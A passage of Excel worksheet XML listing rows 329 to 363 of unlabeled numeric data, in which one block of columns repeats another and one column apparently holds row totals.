        <v>91</v>
      </c>
      <c r="K329" s="7">
        <v>794</v>
      </c>
      <c r="L329" s="8">
        <v>26</v>
      </c>
      <c r="M329" s="8">
        <v>2</v>
      </c>
      <c r="N329" s="8">
        <v>25</v>
      </c>
      <c r="O329" s="8">
        <v>32</v>
      </c>
      <c r="P329" s="8">
        <v>3</v>
      </c>
      <c r="Q329" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="330" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A330" s="7">
        <v>796</v>
      </c>
      <c r="B330" s="8">
        <v>24</v>
      </c>
      <c r="C330" s="8">
        <v>1</v>
      </c>
      <c r="D330" s="8">
        <v>0</v>
      </c>
      <c r="E330" s="8">
        <v>50</v>
      </c>
      <c r="F330" s="8">
        <v>110</v>
      </c>
      <c r="G330" s="8">
        <v>301</v>
      </c>
      <c r="H330" s="8">
        <v>486</v>
      </c>
      <c r="K330" s="7">
        <v>796</v>
      </c>
      <c r="L330" s="8">
        <v>24</v>
      </c>
      <c r="M330" s="8">
        <v>1</v>
      </c>
      <c r="N330" s="8">
        <v>0</v>
      </c>
      <c r="O330" s="8">
        <v>50</v>
      </c>
      <c r="P330" s="8">
        <v>110</v>
      </c>
      <c r="Q330" s="8">
        <v>301</v>
      </c>
    </row>
    <row r="331" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A331" s="7">
        <v>799</v>
      </c>
      <c r="B331" s="8">
        <v>30</v>
      </c>
      <c r="C331" s="8">
        <v>1</v>
      </c>
      <c r="D331" s="8">
        <v>10</v>
      </c>
      <c r="E331" s="8">
        <v>5</v>
      </c>
      <c r="F331" s="8">
        <v>3</v>
      </c>
      <c r="G331" s="8">
        <v>0</v>
      </c>
      <c r="H331" s="8">
        <v>49</v>
      </c>
      <c r="K331" s="7">
        <v>799</v>
      </c>
      <c r="L331" s="8">
        <v>30</v>
      </c>
      <c r="M331" s="8">
        <v>1</v>
      </c>
      <c r="N331" s="8">
        <v>10</v>
      </c>
      <c r="O331" s="8">
        <v>5</v>
      </c>
      <c r="P331" s="8">
        <v>3</v>
      </c>
      <c r="Q331" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="332" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A332" s="7">
        <v>800</v>
      </c>
      <c r="B332" s="8">
        <v>25</v>
      </c>
      <c r="C332" s="8">
        <v>1</v>
      </c>
      <c r="D332" s="8">
        <v>100</v>
      </c>
      <c r="E332" s="8">
        <v>75</v>
      </c>
      <c r="F332" s="8">
        <v>10</v>
      </c>
      <c r="G332" s="8">
        <v>6</v>
      </c>
      <c r="H332" s="8">
        <v>217</v>
      </c>
      <c r="K332" s="7">
        <v>800</v>
      </c>
      <c r="L332" s="8">
        <v>25</v>
      </c>
      <c r="M332" s="8">
        <v>1</v>
      </c>
      <c r="N332" s="8">
        <v>100</v>
      </c>
      <c r="O332" s="8">
        <v>75</v>
      </c>
      <c r="P332" s="8">
        <v>10</v>
      </c>
      <c r="Q332" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="333" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A333" s="7">
        <v>801</v>
      </c>
      <c r="B333" s="8">
        <v>6</v>
      </c>
      <c r="C333" s="8">
        <v>1</v>
      </c>
      <c r="D333" s="8">
        <v>0</v>
      </c>
      <c r="E333" s="8">
        <v>3</v>
      </c>
      <c r="F333" s="8">
        <v>1</v>
      </c>
      <c r="G333" s="8">
        <v>1</v>
      </c>
      <c r="H333" s="8">
        <v>12</v>
      </c>
      <c r="K333" s="7">
        <v>801</v>
      </c>
      <c r="L333" s="8">
        <v>6</v>
      </c>
      <c r="M333" s="8">
        <v>1</v>
      </c>
      <c r="N333" s="8">
        <v>0</v>
      </c>
      <c r="O333" s="8">
        <v>3</v>
      </c>
      <c r="P333" s="8">
        <v>1</v>
      </c>
      <c r="Q333" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="334" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A334" s="7">
        <v>803</v>
      </c>
      <c r="B334" s="8">
        <v>30</v>
      </c>
      <c r="C334" s="8">
        <v>1</v>
      </c>
      <c r="D334" s="8">
        <v>0</v>
      </c>
      <c r="E334" s="8">
        <v>0</v>
      </c>
      <c r="F334" s="8">
        <v>15</v>
      </c>
      <c r="G334" s="8">
        <v>1</v>
      </c>
      <c r="H334" s="8">
        <v>47</v>
      </c>
      <c r="K334" s="7">
        <v>803</v>
      </c>
      <c r="L334" s="8">
        <v>30</v>
      </c>
      <c r="M334" s="8">
        <v>1</v>
      </c>
      <c r="N334" s="8">
        <v>0</v>
      </c>
      <c r="O334" s="8">
        <v>0</v>
      </c>
      <c r="P334" s="8">
        <v>15</v>
      </c>
      <c r="Q334" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="335" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A335" s="7">
        <v>806</v>
      </c>
      <c r="B335" s="8">
        <v>24</v>
      </c>
      <c r="C335" s="8">
        <v>0</v>
      </c>
      <c r="D335" s="8">
        <v>0</v>
      </c>
      <c r="E335" s="8">
        <v>0</v>
      </c>
      <c r="F335" s="8">
        <v>2</v>
      </c>
      <c r="G335" s="8">
        <v>8</v>
      </c>
      <c r="H335" s="8">
        <v>34</v>
      </c>
      <c r="K335" s="7">
        <v>806</v>
      </c>
      <c r="L335" s="8">
        <v>24</v>
      </c>
      <c r="M335" s="8">
        <v>0</v>
      </c>
      <c r="N335" s="8">
        <v>0</v>
      </c>
      <c r="O335" s="8">
        <v>0</v>
      </c>
      <c r="P335" s="8">
        <v>2</v>
      </c>
      <c r="Q335" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="336" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A336" s="7">
        <v>824</v>
      </c>
      <c r="B336" s="8">
        <v>26</v>
      </c>
      <c r="C336" s="8">
        <v>0</v>
      </c>
      <c r="D336" s="8">
        <v>20</v>
      </c>
      <c r="E336" s="8">
        <v>15</v>
      </c>
      <c r="F336" s="8">
        <v>3</v>
      </c>
      <c r="G336" s="8">
        <v>3</v>
      </c>
      <c r="H336" s="8">
        <v>67</v>
      </c>
      <c r="K336" s="7">
        <v>824</v>
      </c>
      <c r="L336" s="8">
        <v>26</v>
      </c>
      <c r="M336" s="8">
        <v>0</v>
      </c>
      <c r="N336" s="8">
        <v>20</v>
      </c>
      <c r="O336" s="8">
        <v>15</v>
      </c>
      <c r="P336" s="8">
        <v>3</v>
      </c>
      <c r="Q336" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="337" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A337" s="7">
        <v>825</v>
      </c>
      <c r="B337" s="8">
        <v>26</v>
      </c>
      <c r="C337" s="8">
        <v>1</v>
      </c>
      <c r="D337" s="8">
        <v>142</v>
      </c>
      <c r="E337" s="8">
        <v>644</v>
      </c>
      <c r="F337" s="8">
        <v>14</v>
      </c>
      <c r="G337" s="8">
        <v>9</v>
      </c>
      <c r="H337" s="8">
        <v>836</v>
      </c>
      <c r="K337" s="7">
        <v>825</v>
      </c>
      <c r="L337" s="8">
        <v>26</v>
      </c>
      <c r="M337" s="8">
        <v>1</v>
      </c>
      <c r="N337" s="8">
        <v>142</v>
      </c>
      <c r="O337" s="8">
        <v>644</v>
      </c>
      <c r="P337" s="8">
        <v>14</v>
      </c>
      <c r="Q337" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="338" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A338" s="7">
        <v>826</v>
      </c>
      <c r="B338" s="8">
        <v>26</v>
      </c>
      <c r="C338" s="8">
        <v>2</v>
      </c>
      <c r="D338" s="8">
        <v>87</v>
      </c>
      <c r="E338" s="8">
        <v>4</v>
      </c>
      <c r="F338" s="8">
        <v>8</v>
      </c>
      <c r="G338" s="8">
        <v>8</v>
      </c>
      <c r="H338" s="8">
        <v>135</v>
      </c>
      <c r="K338" s="7">
        <v>826</v>
      </c>
      <c r="L338" s="8">
        <v>26</v>
      </c>
      <c r="M338" s="8">
        <v>2</v>
      </c>
      <c r="N338" s="8">
        <v>87</v>
      </c>
      <c r="O338" s="8">
        <v>4</v>
      </c>
      <c r="P338" s="8">
        <v>8</v>
      </c>
      <c r="Q338" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="339" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A339" s="7">
        <v>829</v>
      </c>
      <c r="B339" s="8">
        <v>0</v>
      </c>
      <c r="C339" s="8">
        <v>0</v>
      </c>
      <c r="D339" s="8">
        <v>0</v>
      </c>
      <c r="E339" s="8">
        <v>0</v>
      </c>
      <c r="F339" s="8">
        <v>3</v>
      </c>
      <c r="G339" s="8">
        <v>2</v>
      </c>
      <c r="H339" s="8">
        <v>5</v>
      </c>
      <c r="K339" s="7">
        <v>829</v>
      </c>
      <c r="L339" s="8">
        <v>0</v>
      </c>
      <c r="M339" s="8">
        <v>0</v>
      </c>
      <c r="N339" s="8">
        <v>0</v>
      </c>
      <c r="O339" s="8">
        <v>0</v>
      </c>
      <c r="P339" s="8">
        <v>3</v>
      </c>
      <c r="Q339" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="340" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A340" s="7">
        <v>830</v>
      </c>
      <c r="B340" s="8">
        <v>25</v>
      </c>
      <c r="C340" s="8">
        <v>1</v>
      </c>
      <c r="D340" s="8">
        <v>46</v>
      </c>
      <c r="E340" s="8">
        <v>185</v>
      </c>
      <c r="F340" s="8">
        <v>105</v>
      </c>
      <c r="G340" s="8">
        <v>129</v>
      </c>
      <c r="H340" s="8">
        <v>491</v>
      </c>
      <c r="K340" s="7">
        <v>830</v>
      </c>
      <c r="L340" s="8">
        <v>25</v>
      </c>
      <c r="M340" s="8">
        <v>1</v>
      </c>
      <c r="N340" s="8">
        <v>46</v>
      </c>
      <c r="O340" s="8">
        <v>185</v>
      </c>
      <c r="P340" s="8">
        <v>105</v>
      </c>
      <c r="Q340" s="8">
        <v>129</v>
      </c>
    </row>
    <row r="341" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A341" s="7">
        <v>834</v>
      </c>
      <c r="B341" s="8">
        <v>0</v>
      </c>
      <c r="C341" s="8">
        <v>0</v>
      </c>
      <c r="D341" s="8">
        <v>0</v>
      </c>
      <c r="E341" s="8">
        <v>0</v>
      </c>
      <c r="F341" s="8">
        <v>2</v>
      </c>
      <c r="G341" s="8">
        <v>9</v>
      </c>
      <c r="H341" s="8">
        <v>11</v>
      </c>
      <c r="K341" s="7">
        <v>834</v>
      </c>
      <c r="L341" s="8">
        <v>0</v>
      </c>
      <c r="M341" s="8">
        <v>0</v>
      </c>
      <c r="N341" s="8">
        <v>0</v>
      </c>
      <c r="O341" s="8">
        <v>0</v>
      </c>
      <c r="P341" s="8">
        <v>2</v>
      </c>
      <c r="Q341" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="342" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A342" s="7">
        <v>837</v>
      </c>
      <c r="B342" s="8">
        <v>1</v>
      </c>
      <c r="C342" s="8">
        <v>1</v>
      </c>
      <c r="D342" s="8">
        <v>5</v>
      </c>
      <c r="E342" s="8">
        <v>2</v>
      </c>
      <c r="F342" s="8">
        <v>12</v>
      </c>
      <c r="G342" s="8">
        <v>4</v>
      </c>
      <c r="H342" s="8">
        <v>25</v>
      </c>
      <c r="K342" s="7">
        <v>837</v>
      </c>
      <c r="L342" s="8">
        <v>1</v>
      </c>
      <c r="M342" s="8">
        <v>1</v>
      </c>
      <c r="N342" s="8">
        <v>5</v>
      </c>
      <c r="O342" s="8">
        <v>2</v>
      </c>
      <c r="P342" s="8">
        <v>12</v>
      </c>
      <c r="Q342" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="343" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A343" s="7">
        <v>840</v>
      </c>
      <c r="B343" s="8">
        <v>25</v>
      </c>
      <c r="C343" s="8">
        <v>1</v>
      </c>
      <c r="D343" s="8">
        <v>0</v>
      </c>
      <c r="E343" s="8">
        <v>4</v>
      </c>
      <c r="F343" s="8">
        <v>0</v>
      </c>
      <c r="G343" s="8">
        <v>1</v>
      </c>
      <c r="H343" s="8">
        <v>31</v>
      </c>
      <c r="K343" s="7">
        <v>840</v>
      </c>
      <c r="L343" s="8">
        <v>25</v>
      </c>
      <c r="M343" s="8">
        <v>1</v>
      </c>
      <c r="N343" s="8">
        <v>0</v>
      </c>
      <c r="O343" s="8">
        <v>4</v>
      </c>
      <c r="P343" s="8">
        <v>0</v>
      </c>
      <c r="Q343" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="344" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A344" s="7">
        <v>841</v>
      </c>
      <c r="B344" s="8">
        <v>25</v>
      </c>
      <c r="C344" s="8">
        <v>0</v>
      </c>
      <c r="D344" s="8">
        <v>174</v>
      </c>
      <c r="E344" s="8">
        <v>441</v>
      </c>
      <c r="F344" s="8">
        <v>20</v>
      </c>
      <c r="G344" s="8">
        <v>56</v>
      </c>
      <c r="H344" s="8">
        <v>716</v>
      </c>
      <c r="K344" s="7">
        <v>841</v>
      </c>
      <c r="L344" s="8">
        <v>25</v>
      </c>
      <c r="M344" s="8">
        <v>0</v>
      </c>
      <c r="N344" s="8">
        <v>174</v>
      </c>
      <c r="O344" s="8">
        <v>441</v>
      </c>
      <c r="P344" s="8">
        <v>20</v>
      </c>
      <c r="Q344" s="8">
        <v>56</v>
      </c>
    </row>
    <row r="345" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A345" s="7">
        <v>848</v>
      </c>
      <c r="B345" s="8">
        <v>0</v>
      </c>
      <c r="C345" s="8">
        <v>0</v>
      </c>
      <c r="D345" s="8">
        <v>3</v>
      </c>
      <c r="E345" s="8">
        <v>0</v>
      </c>
      <c r="F345" s="8">
        <v>12</v>
      </c>
      <c r="G345" s="8">
        <v>15</v>
      </c>
      <c r="H345" s="8">
        <v>30</v>
      </c>
      <c r="K345" s="7">
        <v>848</v>
      </c>
      <c r="L345" s="8">
        <v>0</v>
      </c>
      <c r="M345" s="8">
        <v>0</v>
      </c>
      <c r="N345" s="8">
        <v>3</v>
      </c>
      <c r="O345" s="8">
        <v>0</v>
      </c>
      <c r="P345" s="8">
        <v>12</v>
      </c>
      <c r="Q345" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="346" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A346" s="7">
        <v>853</v>
      </c>
      <c r="B346" s="8">
        <v>30</v>
      </c>
      <c r="C346" s="8">
        <v>1</v>
      </c>
      <c r="D346" s="8">
        <v>6</v>
      </c>
      <c r="E346" s="8">
        <v>4</v>
      </c>
      <c r="F346" s="8">
        <v>12</v>
      </c>
      <c r="G346" s="8">
        <v>7</v>
      </c>
      <c r="H346" s="8">
        <v>60</v>
      </c>
      <c r="K346" s="7">
        <v>853</v>
      </c>
      <c r="L346" s="8">
        <v>30</v>
      </c>
      <c r="M346" s="8">
        <v>1</v>
      </c>
      <c r="N346" s="8">
        <v>6</v>
      </c>
      <c r="O346" s="8">
        <v>4</v>
      </c>
      <c r="P346" s="8">
        <v>12</v>
      </c>
      <c r="Q346" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="347" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A347" s="7">
        <v>862</v>
      </c>
      <c r="B347" s="8">
        <v>30</v>
      </c>
      <c r="C347" s="8">
        <v>2</v>
      </c>
      <c r="D347" s="8">
        <v>100</v>
      </c>
      <c r="E347" s="8">
        <v>410</v>
      </c>
      <c r="F347" s="8">
        <v>49</v>
      </c>
      <c r="G347" s="8">
        <v>35</v>
      </c>
      <c r="H347" s="8">
        <v>626</v>
      </c>
      <c r="K347" s="7">
        <v>862</v>
      </c>
      <c r="L347" s="8">
        <v>30</v>
      </c>
      <c r="M347" s="8">
        <v>2</v>
      </c>
      <c r="N347" s="8">
        <v>100</v>
      </c>
      <c r="O347" s="8">
        <v>410</v>
      </c>
      <c r="P347" s="8">
        <v>49</v>
      </c>
      <c r="Q347" s="8">
        <v>35</v>
      </c>
    </row>
    <row r="348" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A348" s="7">
        <v>873</v>
      </c>
      <c r="B348" s="8">
        <v>6</v>
      </c>
      <c r="C348" s="8">
        <v>1</v>
      </c>
      <c r="D348" s="8">
        <v>11</v>
      </c>
      <c r="E348" s="8">
        <v>18</v>
      </c>
      <c r="F348" s="8">
        <v>26</v>
      </c>
      <c r="G348" s="8">
        <v>5</v>
      </c>
      <c r="H348" s="8">
        <v>67</v>
      </c>
      <c r="K348" s="7">
        <v>873</v>
      </c>
      <c r="L348" s="8">
        <v>6</v>
      </c>
      <c r="M348" s="8">
        <v>1</v>
      </c>
      <c r="N348" s="8">
        <v>11</v>
      </c>
      <c r="O348" s="8">
        <v>18</v>
      </c>
      <c r="P348" s="8">
        <v>26</v>
      </c>
      <c r="Q348" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="349" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A349" s="7">
        <v>879</v>
      </c>
      <c r="B349" s="8">
        <v>25</v>
      </c>
      <c r="C349" s="8">
        <v>1</v>
      </c>
      <c r="D349" s="8">
        <v>4</v>
      </c>
      <c r="E349" s="8">
        <v>2</v>
      </c>
      <c r="F349" s="8">
        <v>2</v>
      </c>
      <c r="G349" s="8">
        <v>2</v>
      </c>
      <c r="H349" s="8">
        <v>36</v>
      </c>
      <c r="K349" s="7">
        <v>879</v>
      </c>
      <c r="L349" s="8">
        <v>25</v>
      </c>
      <c r="M349" s="8">
        <v>1</v>
      </c>
      <c r="N349" s="8">
        <v>4</v>
      </c>
      <c r="O349" s="8">
        <v>2</v>
      </c>
      <c r="P349" s="8">
        <v>2</v>
      </c>
      <c r="Q349" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="350" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A350" s="7">
        <v>881</v>
      </c>
      <c r="B350" s="8">
        <v>26</v>
      </c>
      <c r="C350" s="8">
        <v>1</v>
      </c>
      <c r="D350" s="8">
        <v>63</v>
      </c>
      <c r="E350" s="8">
        <v>273</v>
      </c>
      <c r="F350" s="8">
        <v>11</v>
      </c>
      <c r="G350" s="8">
        <v>7</v>
      </c>
      <c r="H350" s="8">
        <v>381</v>
      </c>
      <c r="K350" s="7">
        <v>881</v>
      </c>
      <c r="L350" s="8">
        <v>26</v>
      </c>
      <c r="M350" s="8">
        <v>1</v>
      </c>
      <c r="N350" s="8">
        <v>63</v>
      </c>
      <c r="O350" s="8">
        <v>273</v>
      </c>
      <c r="P350" s="8">
        <v>11</v>
      </c>
      <c r="Q350" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="351" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A351" s="7">
        <v>882</v>
      </c>
      <c r="B351" s="8">
        <v>25</v>
      </c>
      <c r="C351" s="8">
        <v>1</v>
      </c>
      <c r="D351" s="8">
        <v>26</v>
      </c>
      <c r="E351" s="8">
        <v>81</v>
      </c>
      <c r="F351" s="8">
        <v>25</v>
      </c>
      <c r="G351" s="8">
        <v>23</v>
      </c>
      <c r="H351" s="8">
        <v>181</v>
      </c>
      <c r="K351" s="7">
        <v>882</v>
      </c>
      <c r="L351" s="8">
        <v>25</v>
      </c>
      <c r="M351" s="8">
        <v>1</v>
      </c>
      <c r="N351" s="8">
        <v>26</v>
      </c>
      <c r="O351" s="8">
        <v>81</v>
      </c>
      <c r="P351" s="8">
        <v>25</v>
      </c>
      <c r="Q351" s="8">
        <v>23</v>
      </c>
    </row>
    <row r="352" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A352" s="7">
        <v>883</v>
      </c>
      <c r="B352" s="8">
        <v>25</v>
      </c>
      <c r="C352" s="8">
        <v>1</v>
      </c>
      <c r="D352" s="8">
        <v>0</v>
      </c>
      <c r="E352" s="8">
        <v>0</v>
      </c>
      <c r="F352" s="8">
        <v>44</v>
      </c>
      <c r="G352" s="8">
        <v>76</v>
      </c>
      <c r="H352" s="8">
        <v>146</v>
      </c>
      <c r="K352" s="7">
        <v>883</v>
      </c>
      <c r="L352" s="8">
        <v>25</v>
      </c>
      <c r="M352" s="8">
        <v>1</v>
      </c>
      <c r="N352" s="8">
        <v>0</v>
      </c>
      <c r="O352" s="8">
        <v>0</v>
      </c>
      <c r="P352" s="8">
        <v>44</v>
      </c>
      <c r="Q352" s="8">
        <v>76</v>
      </c>
    </row>
    <row r="353" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A353" s="7">
        <v>888</v>
      </c>
      <c r="B353" s="8">
        <v>25</v>
      </c>
      <c r="C353" s="8">
        <v>1</v>
      </c>
      <c r="D353" s="8">
        <v>33</v>
      </c>
      <c r="E353" s="8">
        <v>0</v>
      </c>
      <c r="F353" s="8">
        <v>3</v>
      </c>
      <c r="G353" s="8">
        <v>9</v>
      </c>
      <c r="H353" s="8">
        <v>71</v>
      </c>
      <c r="K353" s="7">
        <v>888</v>
      </c>
      <c r="L353" s="8">
        <v>25</v>
      </c>
      <c r="M353" s="8">
        <v>1</v>
      </c>
      <c r="N353" s="8">
        <v>33</v>
      </c>
      <c r="O353" s="8">
        <v>0</v>
      </c>
      <c r="P353" s="8">
        <v>3</v>
      </c>
      <c r="Q353" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="354" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A354" s="7">
        <v>892</v>
      </c>
      <c r="B354" s="8">
        <v>25</v>
      </c>
      <c r="C354" s="8">
        <v>1</v>
      </c>
      <c r="D354" s="8">
        <v>0</v>
      </c>
      <c r="E354" s="8">
        <v>13</v>
      </c>
      <c r="F354" s="8">
        <v>3</v>
      </c>
      <c r="G354" s="8">
        <v>3</v>
      </c>
      <c r="H354" s="8">
        <v>45</v>
      </c>
      <c r="K354" s="7">
        <v>892</v>
      </c>
      <c r="L354" s="8">
        <v>25</v>
      </c>
      <c r="M354" s="8">
        <v>1</v>
      </c>
      <c r="N354" s="8">
        <v>0</v>
      </c>
      <c r="O354" s="8">
        <v>13</v>
      </c>
      <c r="P354" s="8">
        <v>3</v>
      </c>
      <c r="Q354" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="355" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A355" s="7">
        <v>895</v>
      </c>
      <c r="B355" s="8">
        <v>26</v>
      </c>
      <c r="C355" s="8">
        <v>1</v>
      </c>
      <c r="D355" s="8">
        <v>25</v>
      </c>
      <c r="E355" s="8">
        <v>45</v>
      </c>
      <c r="F355" s="8">
        <v>18</v>
      </c>
      <c r="G355" s="8">
        <v>25</v>
      </c>
      <c r="H355" s="8">
        <v>140</v>
      </c>
      <c r="K355" s="7">
        <v>895</v>
      </c>
      <c r="L355" s="8">
        <v>26</v>
      </c>
      <c r="M355" s="8">
        <v>1</v>
      </c>
      <c r="N355" s="8">
        <v>25</v>
      </c>
      <c r="O355" s="8">
        <v>45</v>
      </c>
      <c r="P355" s="8">
        <v>18</v>
      </c>
      <c r="Q355" s="8">
        <v>25</v>
      </c>
    </row>
    <row r="356" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A356" s="7">
        <v>896</v>
      </c>
      <c r="B356" s="8">
        <v>312</v>
      </c>
      <c r="C356" s="8">
        <v>1</v>
      </c>
      <c r="D356" s="8">
        <v>3</v>
      </c>
      <c r="E356" s="8">
        <v>167</v>
      </c>
      <c r="F356" s="8">
        <v>14</v>
      </c>
      <c r="G356" s="8">
        <v>34</v>
      </c>
      <c r="H356" s="8">
        <v>531</v>
      </c>
      <c r="K356" s="7">
        <v>896</v>
      </c>
      <c r="L356" s="8">
        <v>312</v>
      </c>
      <c r="M356" s="8">
        <v>1</v>
      </c>
      <c r="N356" s="8">
        <v>3</v>
      </c>
      <c r="O356" s="8">
        <v>167</v>
      </c>
      <c r="P356" s="8">
        <v>14</v>
      </c>
      <c r="Q356" s="8">
        <v>34</v>
      </c>
    </row>
    <row r="357" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A357" s="7">
        <v>899</v>
      </c>
      <c r="B357" s="8">
        <v>25</v>
      </c>
      <c r="C357" s="8">
        <v>1</v>
      </c>
      <c r="D357" s="8">
        <v>24</v>
      </c>
      <c r="E357" s="8">
        <v>40</v>
      </c>
      <c r="F357" s="8">
        <v>8</v>
      </c>
      <c r="G357" s="8">
        <v>13</v>
      </c>
      <c r="H357" s="8">
        <v>111</v>
      </c>
      <c r="K357" s="7">
        <v>899</v>
      </c>
      <c r="L357" s="8">
        <v>25</v>
      </c>
      <c r="M357" s="8">
        <v>1</v>
      </c>
      <c r="N357" s="8">
        <v>24</v>
      </c>
      <c r="O357" s="8">
        <v>40</v>
      </c>
      <c r="P357" s="8">
        <v>8</v>
      </c>
      <c r="Q357" s="8">
        <v>13</v>
      </c>
    </row>
    <row r="358" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A358" s="7">
        <v>901</v>
      </c>
      <c r="B358" s="8">
        <v>26</v>
      </c>
      <c r="C358" s="8">
        <v>1</v>
      </c>
      <c r="D358" s="8">
        <v>89</v>
      </c>
      <c r="E358" s="8">
        <v>142</v>
      </c>
      <c r="F358" s="8">
        <v>38</v>
      </c>
      <c r="G358" s="8">
        <v>17</v>
      </c>
      <c r="H358" s="8">
        <v>313</v>
      </c>
      <c r="K358" s="7">
        <v>901</v>
      </c>
      <c r="L358" s="8">
        <v>26</v>
      </c>
      <c r="M358" s="8">
        <v>1</v>
      </c>
      <c r="N358" s="8">
        <v>89</v>
      </c>
      <c r="O358" s="8">
        <v>142</v>
      </c>
      <c r="P358" s="8">
        <v>38</v>
      </c>
      <c r="Q358" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="359" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A359" s="7">
        <v>905</v>
      </c>
      <c r="B359" s="8">
        <v>20</v>
      </c>
      <c r="C359" s="8">
        <v>1</v>
      </c>
      <c r="D359" s="8">
        <v>18</v>
      </c>
      <c r="E359" s="8">
        <v>21</v>
      </c>
      <c r="F359" s="8">
        <v>17</v>
      </c>
      <c r="G359" s="8">
        <v>20</v>
      </c>
      <c r="H359" s="8">
        <v>97</v>
      </c>
      <c r="K359" s="7">
        <v>905</v>
      </c>
      <c r="L359" s="8">
        <v>20</v>
      </c>
      <c r="M359" s="8">
        <v>1</v>
      </c>
      <c r="N359" s="8">
        <v>18</v>
      </c>
      <c r="O359" s="8">
        <v>21</v>
      </c>
      <c r="P359" s="8">
        <v>17</v>
      </c>
      <c r="Q359" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="360" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A360" s="7">
        <v>906</v>
      </c>
      <c r="B360" s="8">
        <v>26</v>
      </c>
      <c r="C360" s="8">
        <v>0</v>
      </c>
      <c r="D360" s="8">
        <v>2</v>
      </c>
      <c r="E360" s="8">
        <v>0</v>
      </c>
      <c r="F360" s="8">
        <v>1</v>
      </c>
      <c r="G360" s="8">
        <v>1</v>
      </c>
      <c r="H360" s="8">
        <v>30</v>
      </c>
      <c r="K360" s="7">
        <v>906</v>
      </c>
      <c r="L360" s="8">
        <v>26</v>
      </c>
      <c r="M360" s="8">
        <v>0</v>
      </c>
      <c r="N360" s="8">
        <v>2</v>
      </c>
      <c r="O360" s="8">
        <v>0</v>
      </c>
      <c r="P360" s="8">
        <v>1</v>
      </c>
      <c r="Q360" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="361" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A361" s="7">
        <v>907</v>
      </c>
      <c r="B361" s="8">
        <v>26</v>
      </c>
      <c r="C361" s="8">
        <v>0</v>
      </c>
      <c r="D361" s="8">
        <v>9</v>
      </c>
      <c r="E361" s="8">
        <v>3</v>
      </c>
      <c r="F361" s="8">
        <v>5</v>
      </c>
      <c r="G361" s="8">
        <v>2</v>
      </c>
      <c r="H361" s="8">
        <v>45</v>
      </c>
      <c r="K361" s="7">
        <v>907</v>
      </c>
      <c r="L361" s="8">
        <v>26</v>
      </c>
      <c r="M361" s="8">
        <v>0</v>
      </c>
      <c r="N361" s="8">
        <v>9</v>
      </c>
      <c r="O361" s="8">
        <v>3</v>
      </c>
      <c r="P361" s="8">
        <v>5</v>
      </c>
      <c r="Q361" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="362" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A362" s="7">
        <v>908</v>
      </c>
      <c r="B362" s="8">
        <v>20</v>
      </c>
      <c r="C362" s="8">
        <v>1</v>
      </c>
      <c r="D362" s="8">
        <v>107</v>
      </c>
      <c r="E362" s="8">
        <v>241</v>
      </c>
      <c r="F362" s="8">
        <v>68</v>
      </c>
      <c r="G362" s="8">
        <v>270</v>
      </c>
      <c r="H362" s="8">
        <v>707</v>
      </c>
      <c r="K362" s="7">
        <v>908</v>
      </c>
      <c r="L362" s="8">
        <v>20</v>
      </c>
      <c r="M362" s="8">
        <v>1</v>
      </c>
      <c r="N362" s="8">
        <v>107</v>
      </c>
      <c r="O362" s="8">
        <v>241</v>
      </c>
      <c r="P362" s="8">
        <v>68</v>
      </c>
      <c r="Q362" s="8">
        <v>270</v>
      </c>
    </row>
    <row r="363" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A363" s="7">
        <v>909</v>
      </c>
      <c r="B363" s="8">
        <v>26</v>
      </c>
      <c r="C363" s="8">
        <v>1</v>
      </c>
      <c r="D363" s="8">
        <v>0</v>
      </c>
      <c r="E363" s="8">
        <v>0</v>
      </c>
      <c r="F363" s="8">
        <v>3</v>
      </c>
      <c r="G363" s="8">
        <v>1</v>
      </c>
      <c r="H363" s="8">
